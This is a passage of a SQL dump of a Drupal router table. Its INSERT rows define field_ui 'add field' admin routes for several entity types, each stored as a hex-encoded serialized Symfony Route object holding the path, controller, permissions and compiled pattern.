('field_ui.field_add_node', '/admin/structure/types/manage/{node_type}/add-field/{entity_type}/{field_name}', '/admin/structure/types/manage/%/add-field/%/%', 244, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a37383a222f61646d696e2f7374727563747572652f74797065732f6d616e6167652f7b6e6f64655f747970657d2f6164642d6669656c642f7b656e746974795f747970657d2f7b6669656c645f6e616d657d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a31313a225f636f6e74726f6c6c6572223b733a38303a2244727570616c5c6669656c645f75695c436f6e74726f6c6c65725c4669656c64436f6e666967416464436f6e74726f6c6c65723a3a6669656c64436f6e666967416464436f6e666967757265466f726d223b733a363a225f7469746c65223b733a393a22416464206669656c64223b733a31343a22656e746974795f747970655f6964223b733a343a226e6f6465223b733a363a2262756e646c65223b733a303a22223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32323a2261646d696e6973746572206e6f6465206669656c6473223b7d733a373a226f7074696f6e73223b613a363a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a393a226e6f64655f74797065223b613a323a7b733a343a2274797065223b733a31363a22656e746974793a6e6f64655f74797065223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a393a225f6669656c645f7569223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a333a7b693a303b733a393a226e6f64655f74797065223b693a313b733a31313a22656e746974795f74797065223b693a323b733a31303a226669656c645f6e616d65223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3131363a227b5e2f61646d696e2f7374727563747572652f74797065732f6d616e6167652f283f503c6e6f64655f747970653e5b5e2f5d2b2b292f6164645c2d6669656c642f283f503c656e746974795f747970653e5b5e2f5d2b2b292f283f503c6669656c645f6e616d653e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31303a226669656c645f6e616d65223b693a343b623a313b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31313a22656e746974795f74797065223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f6164642d6669656c64223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a393a226e6f64655f74797065223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a32393a222f61646d696e2f7374727563747572652f74797065732f6d616e616765223b7d7d733a393a22706174685f76617273223b613a333a7b693a303b733a393a226e6f64655f74797065223b693a313b733a31313a22656e746974795f74797065223b693a323b733a31303a226669656c645f6e616d65223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3234343b733a31343a227061747465726e4f75746c696e65223b733a34353a222f61646d696e2f7374727563747572652f74797065732f6d616e6167652f252f6164642d6669656c642f252f25223b733a383a226e756d5061727473223b693a383b7d7d, 8),
('field_ui.field_add_taxonomy_term', '/admin/structure/taxonomy/manage/{taxonomy_vocabulary}/overview/add-field/{entity_type}/{field_name}', '/admin/structure/taxonomy/manage/%/overview/add-field/%/%', 492, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a3130303a222f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e6167652f7b7461786f6e6f6d795f766f636162756c6172797d2f6f766572766965772f6164642d6669656c642f7b656e746974795f747970657d2f7b6669656c645f6e616d657d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a31313a225f636f6e74726f6c6c6572223b733a38303a2244727570616c5c6669656c645f75695c436f6e74726f6c6c65725c4669656c64436f6e666967416464436f6e74726f6c6c65723a3a6669656c64436f6e666967416464436f6e666967757265466f726d223b733a363a225f7469746c65223b733a393a22416464206669656c64223b733a31343a22656e746974795f747970655f6964223b733a31333a227461786f6e6f6d795f7465726d223b733a363a2262756e646c65223b733a303a22223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a33313a2261646d696e6973746572207461786f6e6f6d795f7465726d206669656c6473223b7d733a373a226f7074696f6e73223b613a363a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31323a225f61646d696e5f726f757465223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31393a227461786f6e6f6d795f766f636162756c617279223b613a323a7b733a343a2274797065223b733a32363a22656e746974793a7461786f6e6f6d795f766f636162756c617279223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a393a225f6669656c645f7569223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a333a7b693a303b733a31393a227461786f6e6f6d795f766f636162756c617279223b693a313b733a31313a22656e746974795f74797065223b693a323b733a31303a226669656c645f6e616d65223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3133383a227b5e2f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e6167652f283f503c7461786f6e6f6d795f766f636162756c6172793e5b5e2f5d2b2b292f6f766572766965772f6164645c2d6669656c642f283f503c656e746974795f747970653e5b5e2f5d2b2b292f283f503c6669656c645f6e616d653e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31303a226669656c645f6e616d65223b693a343b623a313b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31313a22656e746974795f74797065223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31393a222f6f766572766965772f6164642d6669656c64223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31393a227461786f6e6f6d795f766f636162756c617279223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a33323a222f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e616765223b7d7d733a393a22706174685f76617273223b613a333a7b693a303b733a31393a227461786f6e6f6d795f766f636162756c617279223b693a313b733a31313a22656e746974795f74797065223b693a323b733a31303a226669656c645f6e616d65223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3439323b733a31343a227061747465726e4f75746c696e65223b733a35373a222f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e6167652f252f6f766572766965772f6164642d6669656c642f252f25223b733a383a226e756d5061727473223b693a393b7d7d, 9),
('field_ui.field_add_user', '/admin/config/people/accounts/add-field/{entity_type}/{field_name}', '/admin/config/people/accounts/add-field/%/%', 124, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a36363a222f61646d696e2f636f6e6669672f70656f706c652f6163636f756e74732f6164642d6669656c642f7b656e746974795f747970657d2f7b6669656c645f6e616d657d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a31313a225f636f6e74726f6c6c6572223b733a38303a2244727570616c5c6669656c645f75695c436f6e74726f6c6c65725c4669656c64436f6e666967416464436f6e74726f6c6c65723a3a6669656c64436f6e666967416464436f6e666967757265466f726d223b733a363a225f7469746c65223b733a393a22416464206669656c64223b733a31343a22656e746974795f747970655f6964223b733a343a2275736572223b733a363a2262756e646c65223b733a343a2275736572223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32323a2261646d696e69737465722075736572206669656c6473223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a393a225f6669656c645f7569223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31313a22656e746974795f74797065223b693a313b733a31303a226669656c645f6e616d65223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a39343a227b5e2f61646d696e2f636f6e6669672f70656f706c652f6163636f756e74732f6164645c2d6669656c642f283f503c656e746974795f747970653e5b5e2f5d2b2b292f283f503c6669656c645f6e616d653e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31303a226669656c645f6e616d65223b693a343b623a313b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31313a22656e746974795f74797065223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a33393a222f61646d696e2f636f6e6669672f70656f706c652f6163636f756e74732f6164642d6669656c64223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31313a22656e746974795f74797065223b693a313b733a31303a226669656c645f6e616d65223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132343b733a31343a227061747465726e4f75746c696e65223b733a34333a222f61646d696e2f636f6e6669672f70656f706c652f6163636f756e74732f6164642d6669656c642f252f25223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('field_ui.field_storage_config_add_block_content', '/admin/structure/block-content/manage/{block_content_type}/fields/add-field', '/admin/structure/block-content/manage/%/fields/add-field', 123, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a37353a222f61646d696e2f7374727563747572652f626c6f636b2d636f6e74656e742f6d616e6167652f7b626c6f636b5f636f6e74656e745f747970657d2f6669656c64732f6164642d6669656c64223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a353a225f666f726d223b733a34313a225c44727570616c5c6669656c645f75695c466f726d5c4669656c6453746f72616765416464466f726d223b733a363a225f7469746c65223b733a393a22416464206669656c64223b733a31343a22656e746974795f747970655f6964223b733a31333a22626c6f636b5f636f6e74656e74223b733a363a2262756e646c65223b733a303a22223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a33313a2261646d696e697374657220626c6f636b5f636f6e74656e74206669656c6473223b7d733a373a226f7074696f6e73223b613a363a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31383a22626c6f636b5f636f6e74656e745f74797065223b613a323a7b733a343a2274797065223b733a32353a22656e746974793a626c6f636b5f636f6e74656e745f74797065223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a393a225f6669656c645f7569223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a39343a227b5e2f61646d696e2f7374727563747572652f626c6f636b5c2d636f6e74656e742f6d616e6167652f283f503c626c6f636b5f636f6e74656e745f747970653e5b5e2f5d2b2b292f6669656c64732f6164645c2d6669656c64247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31373a222f6669656c64732f6164642d6669656c64223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a33373a222f61646d696e2f7374727563747572652f626c6f636b2d636f6e74656e742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132333b733a31343a227061747465726e4f75746c696e65223b733a35363a222f61646d696e2f7374727563747572652f626c6f636b2d636f6e74656e742f6d616e6167652f252f6669656c64732f6164642d6669656c64223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('field_ui.field_storage_config_add_block_content.bc', '/admin/structure/block/block-content/manage/{block_content_type}/fields/add-field', '/admin/structure/block/block-content/manage/%/fields/add-field', 251, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a38313a222f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b2d636f6e74656e742f6d616e6167652f7b626c6f636b5f636f6e74656e745f747970657d2f6669656c64732f6164642d6669656c64223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a363a225f7469746c65223b733a393a22416464206669656c64223b733a31343a22656e746974795f747970655f6964223b733a31333a22626c6f636b5f636f6e74656e74223b733a363a2262756e646c65223b733a303a22223b733a31313a225f636f6e74726f6c6c6572223b733a38313a225c44727570616c5c626c6f636b5f636f6e74656e745c436f6e74726f6c6c65725c426c6f636b436f6e74656e74436f6e74726f6c6c65723a3a626c6f636b436f6e74656e74547970655265646972656374223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a33313a2261646d696e697374657220626c6f636b5f636f6e74656e74206669656c6473223b7d733a373a226f7074696f6e73223b613a363a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31383a22626c6f636b5f636f6e74656e745f74797065223b613a323a7b733a343a2274797065223b733a32353a22656e746974793a626c6f636b5f636f6e74656e745f74797065223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a393a225f6669656c645f7569223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3130303a227b5e2f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b5c2d636f6e74656e742f6d616e6167652f283f503c626c6f636b5f636f6e74656e745f747970653e5b5e2f5d2b2b292f6669656c64732f6164645c2d6669656c64247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31373a222f6669656c64732f6164642d6669656c64223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a34333a222f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b2d636f6e74656e742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3235313b733a31343a227061747465726e4f75746c696e65223b733a36323a222f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b2d636f6e74656e742f6d616e6167652f252f6669656c64732f6164642d6669656c64223b733a383a226e756d5061727473223b693a383b7d7d, 8),
('field_ui.field_storage_config_add_comment', '/admin/structure/comment/manage/{comment_type}/fields/add-field', '/admin/structure/comment/manage/%/fields/add-field', 123, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a36333a222f61646d696e2f7374727563747572652f636f6d6d656e742f6d616e6167652f7b636f6d6d656e745f747970657d2f6669656c64732f6164642d6669656c64223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a353a225f666f726d223b733a34313a225c44727570616c5c6669656c645f75695c466f726d5c4669656c6453746f72616765416464466f726d223b733a363a225f7469746c65223b733a393a22416464206669656c64223b733a31343a22656e746974795f747970655f6964223b733a373a22636f6d6d656e74223b733a363a2262756e646c65223b733a303a22223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32353a2261646d696e697374657220636f6d6d656e74206669656c6473223b7d733a373a226f7074696f6e73223b613a363a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31323a225f61646d696e5f726f757465223b623a313b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31323a22636f6d6d656e745f74797065223b613a323a7b733a343a2274797065223b733a31393a22656e746974793a636f6d6d656e745f74797065223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a393a225f6669656c645f7569223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31323a22636f6d6d656e745f74797065223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a38313a227b5e2f61646d696e2f7374727563747572652f636f6d6d656e742f6d616e6167652f283f503c636f6d6d656e745f747970653e5b5e2f5d2b2b292f6669656c64732f6164645c2d6669656c64247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31373a222f6669656c64732f6164642d6669656c64223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a22636f6d6d656e745f74797065223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a33313a222f61646d696e2f7374727563747572652f636f6d6d656e742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31323a22636f6d6d656e745f74797065223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132333b733a31343a227061747465726e4f75746c696e65223b733a35303a222f61646d696e2f7374727563747572652f636f6d6d656e742f6d616e6167652f252f6669656c64732f6164642d6669656c64223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('field_ui.field_storage_config_add_contact_message', '/admin/structure/contact/manage/{contact_form}/fields/add-field', '/admin/structure/contact/manage/%/fields/add-field', 123, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a36333a222f61646d696e2f7374727563747572652f636f6e746163742f6d616e6167652f7b636f6e746163745f666f726d7d2f6669656c64732f6164642d6669656c64223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a353a225f666f726d223b733a34313a225c44727570616c5c6669656c645f75695c466f726d5c4669656c6453746f72616765416464466f726d223b733a363a225f7469746c65223b733a393a22416464206669656c64223b733a31343a22656e746974795f747970655f6964223b733a31353a22636f6e746163745f6d657373616765223b733a363a2262756e646c65223b733a303a22223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a33333a2261646d696e697374657220636f6e746163745f6d657373616765206669656c6473223b7d733a373a226f7074696f6e73223b613a363a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31323a22636f6e746163745f666f726d223b613a323a7b733a343a2274797065223b733a31393a22656e746974793a636f6e746163745f666f726d223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a393a225f6669656c645f7569223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31323a22636f6e746163745f666f726d223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a38313a227b5e2f61646d696e2f7374727563747572652f636f6e746163742f6d616e6167652f283f503c636f6e746163745f666f726d3e5b5e2f5d2b2b292f6669656c64732f6164645c2d6669656c64247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31373a222f6669656c64732f6164642d6669656c64223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a22636f6e746163745f666f726d223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a33313a222f61646d696e2f7374727563747572652f636f6e746163742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31323a22636f6e746163745f666f726d223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132333b733a31343a227061747465726e4f75746c696e65223b733a35303a222f61646d696e2f7374727563747572652f636f6e746163742f6d616e6167652f252f6669656c64732f6164642d6669656c64223b733a383a226e756d5061727473223b693a373b7d7d, 7);
INSERT INTO `router` (`name`, `path`, `pattern_outline`, `fit`, `route`, `number_parts`) VALUES
('field_ui.field_storage_config_add_media', '/admin/structure/media/manage/{media_type}/fields/add-field', '/admin/structure/media/manage/%/fields/add-field', 123, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a35393a222f61646d696e2f7374727563747572652f6d656469612f6d616e6167652f7b6d656469615f747970657d2f6669656c64732f6164642d6669656c64223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a353a225f666f726d223b733a34313a225c44727570616c5c6669656c645f75695c466f726d5c4669656c6453746f72616765416464466f726d223b733a363a225f7469746c65223b733a393a22416464206669656c64223b733a31343a22656e746974795f747970655f6964223b733a353a226d65646961223b733a363a2262756e646c65223b733a303a22223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32333a2261646d696e6973746572206d65646961206669656c6473223b7d733a373a226f7074696f6e73223b613a363a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31303a226d656469615f74797065223b613a323a7b733a343a2274797065223b733a31373a22656e746974793a6d656469615f74797065223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a393a225f6669656c645f7569223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31303a226d656469615f74797065223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a37373a227b5e2f61646d696e2f7374727563747572652f6d656469612f6d616e6167652f283f503c6d656469615f747970653e5b5e2f5d2b2b292f6669656c64732f6164645c2d6669656c64247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31373a222f6669656c64732f6164642d6669656c64223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31303a226d656469615f74797065223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a32393a222f61646d696e2f7374727563747572652f6d656469612f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31303a226d656469615f74797065223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132333b733a31343a227061747465726e4f75746c696e65223b733a34383a222f61646d696e2f7374727563747572652f6d656469612f6d616e6167652f252f6669656c64732f6164642d6669656c64223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('field_ui.field_storage_config_add_node', '/admin/structure/types/manage/{node_type}/fields/add-field', '/admin/structure/types/manage/%/fields/add-field', 123, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a35383a222f61646d696e2f7374727563747572652f74797065732f6d616e6167652f7b6e6f64655f747970657d2f6669656c64732f6164642d6669656c64223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a353a225f666f726d223b733a34313a225c44727570616c5c6669656c645f75695c466f726d5c4669656c6453746f72616765416464466f726d223b733a363a225f7469746c65223b733a393a22416464206669656c64223b733a31343a22656e746974795f747970655f6964223b733a343a226e6f6465223b733a363a2262756e646c65223b733a303a22223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32323a2261646d696e6973746572206e6f6465206669656c6473223b7d733a373a226f7074696f6e73223b613a363a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a393a226e6f64655f74797065223b613a323a7b733a343a2274797065223b733a31363a22656e746974793a6e6f64655f74797065223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d